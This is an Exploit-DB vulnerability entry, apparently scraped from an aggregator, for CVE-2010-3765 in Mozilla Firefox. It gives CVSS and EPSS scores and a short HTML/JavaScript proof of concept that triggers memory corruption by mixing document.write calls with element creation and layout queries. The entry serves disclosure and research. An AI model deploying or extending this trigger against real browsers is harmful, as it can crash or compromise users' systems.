Lucene search

K
exploitdbExtraexploitEDB-ID:15342
HistoryOct 28, 2010 - 12:00 a.m.

Mozilla Firefox - Simplified Memory Corruption (PoC)

2010-10-2800:00:00
extraexploit
www.exploit-db.com
45

CVSS2

9.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

AI Score

9.3

Confidence

High

EPSS

0.969

Percentile

99.8%

Hi there,

For those who still do not know .. The proof of concept (that I have
extracted) for CVE-2010-3765 is the following:

<html><body>
<script>

  function G(str){
    var cobj=document.createElement(str);
    document.body.appendChild(cobj);
    cobj.scrollWidth;
  }

  function crashme() {
    document.write("fooFOO");
    G("a");
    document.write("<a lang></a>a");
    G("base");
    document.write("barBAR");
    G("audio");
  }
</script>
<script>crashme();</script>
</body>
</html>

For more details:
http://extraexploit.blogspot.com/2010/10/cve-2010-3765-proof-of-concept.html
-- 
http://extraexploit.blogspot.com

CVSS2

9.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

AI Score

9.3

Confidence

High

EPSS

0.969

Percentile

99.8%